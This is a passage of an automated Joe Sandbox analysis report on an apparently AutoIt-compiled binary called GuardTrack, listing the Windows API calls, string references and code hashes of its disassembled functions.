                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpperVisibleWindow
                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                          • API String ID: 4105515805-45149045
                                                          • Opcode ID: c104fa468ddb7b233800f9466f533573f91fdb8f28be10a5ad55fdfe6e8a5866
                                                          • Instruction ID: bb93723f937371772fa554f793b35781172bb95c93634b28ad112a99af602182
                                                          • Opcode Fuzzy Hash: c104fa468ddb7b233800f9466f533573f91fdb8f28be10a5ad55fdfe6e8a5866
                                                          • Instruction Fuzzy Hash: BED191302046118FCB14EF14C455AAABBA7AF94354F10485EF9865B3E3CF31EE0ACB92
                                                          APIs
                                                          • SetTextColor.GDI32(?,00000000), ref: 0063AC55
                                                          • GetSysColorBrush.USER32(0000000F), ref: 0063AC86
                                                          • GetSysColor.USER32(0000000F), ref: 0063AC92
                                                          • SetBkColor.GDI32(?,000000FF), ref: 0063ACAC
                                                          • SelectObject.GDI32(?,?), ref: 0063ACBB
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0063ACE6
                                                          • GetSysColor.USER32(00000010), ref: 0063ACEE
                                                          • CreateSolidBrush.GDI32(00000000), ref: 0063ACF5
                                                          • FrameRect.USER32(?,?,00000000), ref: 0063AD04
                                                          • DeleteObject.GDI32(00000000), ref: 0063AD0B
                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0063AD56
                                                          • FillRect.USER32(?,?,?), ref: 0063AD88
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0063ADB3
                                                            • Part of subcall function 0063AF18: GetSysColor.USER32(00000012), ref: 0063AF51
                                                            • Part of subcall function 0063AF18: SetTextColor.GDI32(?,?), ref: 0063AF55
                                                            • Part of subcall function 0063AF18: GetSysColorBrush.USER32(0000000F), ref: 0063AF6B
                                                            • Part of subcall function 0063AF18: GetSysColor.USER32(0000000F), ref: 0063AF76
                                                            • Part of subcall function 0063AF18: GetSysColor.USER32(00000011), ref: 0063AF93
                                                            • Part of subcall function 0063AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0063AFA1
                                                            • Part of subcall function 0063AF18: SelectObject.GDI32(?,00000000), ref: 0063AFB2
                                                            • Part of subcall function 0063AF18: SetBkColor.GDI32(?,00000000), ref: 0063AFBB
                                                            • Part of subcall function 0063AF18: SelectObject.GDI32(?,?), ref: 0063AFC8
                                                            • Part of subcall function 0063AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0063AFE7
                                                            • Part of subcall function 0063AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0063AFFE
                                                            • Part of subcall function 0063AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0063B013
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                          • String ID:
                                                          • API String ID: 4124339563-0
                                                          • Opcode ID: f28c99442add4979d8ee5c820de1bf5243bd3f3f670a73183709c79b28253583
                                                          • Instruction ID: b3544e31b11e1afb5b40764e5d3964bc42015681563e318885595032515b13f0
                                                          • Opcode Fuzzy Hash: f28c99442add4979d8ee5c820de1bf5243bd3f3f670a73183709c79b28253583
                                                          • Instruction Fuzzy Hash: 55A19275008311AFE7159FA4DD08AAB7BAAFF49321F101A1DFA92961E0C731D840DF92
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?), ref: 005B3072
                                                          • DeleteObject.GDI32(00000000), ref: 005B30B8
                                                          • DeleteObject.GDI32(00000000), ref: 005B30C3
                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 005B30CE
                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 005B30D9
                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 005EC77C
                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 005EC7B5
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 005ECBDE
                                                            • Part of subcall function 005B1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005B2412,?,00000000,?,?,?,?,005B1AA7,00000000,?), ref: 005B1F76
                                                          • SendMessageW.USER32(?,00001053), ref: 005ECC1B
                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 005ECC32
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 005ECC48
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 005ECC53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                          • String ID: 0
                                                          • API String ID: 464785882-4108050209
                                                          • Opcode ID: d11f26aae8e493cbb1bf9c2b443af5ee3322ab4e18657b5447f29a69e6bf09f0
                                                          • Instruction ID: d53dad80f5d96d69bf397d32c19fe92c1d3623f58197896a55d31653e4b6e15d
                                                          • Opcode Fuzzy Hash: d11f26aae8e493cbb1bf9c2b443af5ee3322ab4e18657b5447f29a69e6bf09f0
                                                          • Instruction Fuzzy Hash: DF12BC30604295EFDB28DF25C888BA9BFA5FF49300F144569F999DB262C731EC42CB91
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                          • API String ID: 2660009612-1645009161
                                                          • Opcode ID: 4b202d6111b3df0989160b37ee257adc176f61dc54dcc8fd328a94c6212d9dfa
                                                          • Instruction ID: 115e4063341f0dc398aefb84648deaebe452efe44bd3b7b1a1a3fac94dd70213
                                                          • Opcode Fuzzy Hash: 4b202d6111b3df0989160b37ee257adc176f61dc54dcc8fd328a94c6212d9dfa
                                                          • Instruction Fuzzy Hash: B1A19030A4020AAFCB24AFA5DC56FBE3F65BF85740F14002EF905AB292DBB19E41D751
                                                          APIs
                                                          • DestroyWindow.USER32(00000000), ref: 00627BC8
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00627C87
                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00627CC5
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00627CD7
                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00627D1D
                                                          • GetClientRect.USER32(00000000,?), ref: 00627D29
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00627D6D
                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00627D7C
                                                          • GetStockObject.GDI32(00000011), ref: 00627D8C
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00627D90
                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00627DA0
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00627DA9
                                                          • DeleteDC.GDI32(00000000), ref: 00627DB2
                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00627DDE
                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00627DF5
                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00627E30
                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00627E44
                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00627E55
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00627E85
                                                          • GetStockObject.GDI32(00000011), ref: 00627E90
                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00627E9B
                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00627EA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                          • API String ID: 2910397461-517079104
                                                          • Opcode ID: 23a21742cbd550850c9e732903d60629f73aed92fba4abd5f13fde5191569d4e
                                                          • Instruction ID: f2cbc2cf86ef0857bec9f74c8f0e7a7ac47600bed73593a9e0b57247e18b350b
                                                          • Opcode Fuzzy Hash: 23a21742cbd550850c9e732903d60629f73aed92fba4abd5f13fde5191569d4e
                                                          • Instruction Fuzzy Hash: FBA170B5A00619BFEB14DBA4DC4AFAE7BBAEB45710F004114FA25A72E1D770AD40CF64
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0061B361
                                                          • GetDriveTypeW.KERNEL32(?,00642C4C,?,\\.\,00640980), ref: 0061B43E
                                                          • SetErrorMode.KERNEL32(00000000,00642C4C,?,\\.\,00640980), ref: 0061B59C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DriveType
                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                          • API String ID: 2907320926-4222207086
                                                          • Opcode ID: 3441ca837a223da01b7f6fbc2e2c207d3b4e23543e99f1e306ed0dca2ffc09e1
                                                          • Instruction ID: faa6ec878746a0e17d8f7397936716ba1bcfdb199de6fa57f96c70ab23fe8e20
                                                          • Opcode Fuzzy Hash: 3441ca837a223da01b7f6fbc2e2c207d3b4e23543e99f1e306ed0dca2ffc09e1
                                                          • Instruction Fuzzy Hash: 8E517534B40209EB8B04DF60C946AFD7BE3AB89740B6DE015F406E7291D7B1AEC2DB55
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0063A0F7
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0063A1B0
                                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 0063A1CC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: 0
                                                          • API String ID: 2326795674-4108050209
                                                          • Opcode ID: e1472718a2d814f2fe5da3da7e821403b9a8f1fe42265eea3c5b32b6820a783b
                                                          • Instruction ID: 11b49424c51ec2c8590ac3c2a7672452971e9f0919a61aeedf67e0e7f0aa59e2
                                                          • Opcode Fuzzy Hash: e1472718a2d814f2fe5da3da7e821403b9a8f1fe42265eea3c5b32b6820a783b
                                                          • Instruction Fuzzy Hash: F602DC30108301AFE715CF54C849BAABBE6FF86314F08861DF9DA963A1C775D941EB92
                                                          APIs
                                                          • GetSysColor.USER32(00000012), ref: 0063AF51
                                                          • SetTextColor.GDI32(?,?), ref: 0063AF55
                                                          • GetSysColorBrush.USER32(0000000F), ref: 0063AF6B
                                                          • GetSysColor.USER32(0000000F), ref: 0063AF76
                                                          • CreateSolidBrush.GDI32(?), ref: 0063AF7B
                                                          • GetSysColor.USER32(00000011), ref: 0063AF93
                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0063AFA1
                                                          • SelectObject.GDI32(?,00000000), ref: 0063AFB2
                                                          • SetBkColor.GDI32(?,00000000), ref: 0063AFBB
                                                          • SelectObject.GDI32(?,?), ref: 0063AFC8
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0063AFE7
                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0063AFFE
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0063B013
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0063B05F
                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0063B086
                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0063B0A4
                                                          • DrawFocusRect.USER32(?,?), ref: 0063B0AF
                                                          • GetSysColor.USER32(00000011), ref: 0063B0BD
                                                          • SetTextColor.GDI32(?,00000000), ref: 0063B0C5
                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0063B0D9
                                                          • SelectObject.GDI32(?,0063AC1F), ref: 0063B0F0
                                                          • DeleteObject.GDI32(?), ref: 0063B0FB
                                                          • SelectObject.GDI32(?,?), ref: 0063B101
                                                          • DeleteObject.GDI32(?), ref: 0063B106
                                                          • SetTextColor.GDI32(?,?), ref: 0063B10C
                                                          • SetBkColor.GDI32(?,?), ref: 0063B116
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 1996641542-0
                                                          • Opcode ID: ab92f6e5d9242bee5e6fb183ca4d5c3cffb6bd06383a4738a7c10ab17eb5bfcc
                                                          • Instruction ID: 1f4543d70ab22ec7e3e6aaec7cc70f06658b89b8b8a5261f5dbf225b636ccc07
                                                          • Opcode Fuzzy Hash: ab92f6e5d9242bee5e6fb183ca4d5c3cffb6bd06383a4738a7c10ab17eb5bfcc
                                                          • Instruction Fuzzy Hash: E0616B75900228BFEB159FA4DC48AEE7B7AEF09320F109119FA15AB2A1D7719940DF90
                                                          APIs
                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 006390EA
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006390FB
                                                          • CharNextW.USER32(0000014E), ref: 0063912A
                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0063916B
                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00639181
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00639192
                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 006391AF
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 006391FB
                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00639211
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00639242
                                                          • _memset.LIBCMT ref: 00639267
                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 006392B0
                                                          • _memset.LIBCMT ref: 0063930F
                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00639339
                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00639391
                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 0063943E
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00639460
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006394AA
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006394D7
                                                          • DrawMenuBar.USER32(?), ref: 006394E6
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 0063950E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                          • String ID: 0
                                                          • API String ID: 1073566785-4108050209
                                                          • Opcode ID: 209584da18a860e431e1c4610d632741e8e9cfb11cc012b953717679bd7b8d69
                                                          • Instruction ID: 3b2d480dfa19471a506f67acde8b3a7ad993ec92ca4758c95491957b0806a3b9
                                                          • Opcode Fuzzy Hash: 209584da18a860e431e1c4610d632741e8e9cfb11cc012b953717679bd7b8d69
                                                          • Instruction Fuzzy Hash: 4FE1B775900219AFDF209F54CC84EEF7BBAFF05750F10815AFA19A6291D7B08A81CFA1
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 00635007
                                                          • GetDesktopWindow.USER32 ref: 0063501C
                                                          • GetWindowRect.USER32(00000000), ref: 00635023
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00635085
                                                          • DestroyWindow.USER32(?), ref: 006350B1
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006350DA
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006350F8
                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0063511E
                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00635133
                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00635146
                                                          • IsWindowVisible.USER32(?), ref: 00635166
                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00635181
                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00635195
                                                          • GetWindowRect.USER32(?,?), ref: 006351AD
                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 006351D3
                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 006351ED
                                                          • CopyRect.USER32(?,?), ref: 00635204
                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 0063526F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                          • String ID: ($0$tooltips_class32
                                                          • API String ID: 698492251-4156429822
                                                          • Opcode ID: f1dd915e488f85b85dd5aea8f5319fcd0fce3d0244e1d7d41f324f03d4a04987
                                                          • Instruction ID: 20f21a3a1739b2f56cd7f17dd37189f1a6f1f01b98fa2eb153e1e8b1d8a3fe16
                                                          • Opcode Fuzzy Hash: f1dd915e488f85b85dd5aea8f5319fcd0fce3d0244e1d7d41f324f03d4a04987
                                                          • Instruction Fuzzy Hash: D9B18C71604751AFD704DF64C848BABBBE6FF89310F00891CF99A9B291DB71E905CB92
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0061499C
                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 006149C2
                                                          • _wcscpy.LIBCMT ref: 006149F0
                                                          • _wcscmp.LIBCMT ref: 006149FB
                                                          • _wcscat.LIBCMT ref: 00614A11
                                                          • _wcsstr.LIBCMT ref: 00614A1C
                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00614A38
                                                          • _wcscat.LIBCMT ref: 00614A81
                                                          • _wcscat.LIBCMT ref: 00614A88
                                                          • _wcsncpy.LIBCMT ref: 00614AB3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                          • API String ID: 699586101-1459072770
                                                          • Opcode ID: f9d5588b9fcb37b46ebfa42280f79ffe47df40ee7f09d6367ee0f11c9b8eb9e9
                                                          • Instruction ID: c3c36656a7455d28cc232d6171595a246b13e0b399012a49794338fa2c7ae965
                                                          • Opcode Fuzzy Hash: f9d5588b9fcb37b46ebfa42280f79ffe47df40ee7f09d6367ee0f11c9b8eb9e9
                                                          • Instruction Fuzzy Hash: 55411972604206BBE720B7788C4BEFF7B6DEF81710F14045BF904E7292EB359A4196A5
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005B2C8C
                                                          • GetSystemMetrics.USER32(00000007), ref: 005B2C94
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005B2CBF
                                                          • GetSystemMetrics.USER32(00000008), ref: 005B2CC7
                                                          • GetSystemMetrics.USER32(00000004), ref: 005B2CEC
                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 005B2D09
                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 005B2D19
                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 005B2D4C
                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 005B2D60
                                                          • GetClientRect.USER32(00000000,000000FF), ref: 005B2D7E
                                                          • GetStockObject.GDI32(00000011), ref: 005B2D9A
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 005B2DA5
                                                            • Part of subcall function 005B2714: GetCursorPos.USER32(?), ref: 005B2727
                                                            • Part of subcall function 005B2714: ScreenToClient.USER32(006777B0,?), ref: 005B2744
                                                            • Part of subcall function 005B2714: GetAsyncKeyState.USER32(00000001), ref: 005B2769
                                                            • Part of subcall function 005B2714: GetAsyncKeyState.USER32(00000002), ref: 005B2777
                                                          • SetTimer.USER32(00000000,00000000,00000028,005B13C7), ref: 005B2DCC
                                                          Strings
